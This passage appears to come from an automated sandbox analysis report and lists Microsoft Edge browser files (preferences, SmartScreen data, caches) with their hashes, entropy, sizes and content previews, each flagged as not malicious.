                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:uriCache_

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.008648044185784
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQATQmy:YWLSGTt1o9LuLgfGBPAzkVj/T8lQAcd
                                                                                                                                                                                                                                                                                                  MD5:B3A726BBE72F0B1F24C5DCB6A95677C6
                                                                                                                                                                                                                                                                                                  SHA1:19C4062BE09D56E86C68AD16059402802B20C55D
                                                                                                                                                                                                                                                                                                  SHA-256:0A89C1A934A6D01A7BAB066BE82DA0266653FC9FEEDA74D48E6E3208BC535915
                                                                                                                                                                                                                                                                                                  SHA-512:7BC1ABEB22C76D3B22BCEEE280A5416A4F190D1F7CBF64277F73E0264A9BAA1C2BBA4A3F111AA4C51DB3CEE8FEDFBC47E1AB8762C8750C9DAC9F3BCDCF4ED425
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735032265429350}]}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                  MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                  SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                  SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                  SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cf100d72-acfd-4fa3-a695-988d74920346.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45749
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088387241761036
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:mMkbJrT8IeQc5d9R59ouAhDO6vP6O7xp+fiP3uFEFhGycfCAomGoup1Xl3jVzXrR:mMk1rT8H19R5L6befLFRomhu3VlXr4i
                                                                                                                                                                                                                                                                                                  MD5:F7802C780D21FF76D561D6316D80080C
                                                                                                                                                                                                                                                                                                  SHA1:7D680C367148C4E40931653141C00178974CF9F0
                                                                                                                                                                                                                                                                                                  SHA-256:625FF7C32808B0EEC1BB26B30A78446F90ADC324853E0C1A5C0604012603A1BD
                                                                                                                                                                                                                                                                                                  SHA-512:6E304F30563E5C53FC40F02A47366C111E1B7D27C9C05AC29975478C0EB526DBC6FF682B564CE51C7826A2EC2E7699CBA8A23A465282979DD5ABF7068E266DD3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d85c93bb-a762-4e2d-b514-b67c44a7ef3c.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44600
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096219577018695
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fu2lCFTkJv8UDPccGoup1XlI:z/Ps+wsI7ynEf6befGchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:60A20E62DA052BE31ECFCCE48FBD9FC6
                                                                                                                                                                                                                                                                                                  SHA1:1D911DD76A2D6A7DC3C892AE497F944518AA5006
                                                                                                                                                                                                                                                                                                  SHA-256:8AEB2A87780DA87EBC39CDC261F20F867485B722984FE643B2FB3A081CFD1EFF
                                                                                                                                                                                                                                                                                                  SHA-512:1E1471584DC9880071AF4DF8D30DCFEF73536DBEF1B29D479D44B3AE97C655BCD93716921B0D77BC0265E1D7892588325FA500CBF65EEE94000E3F0D4199DB9D
                                                                                                                                                                                                                                                                                                  Malicious:false
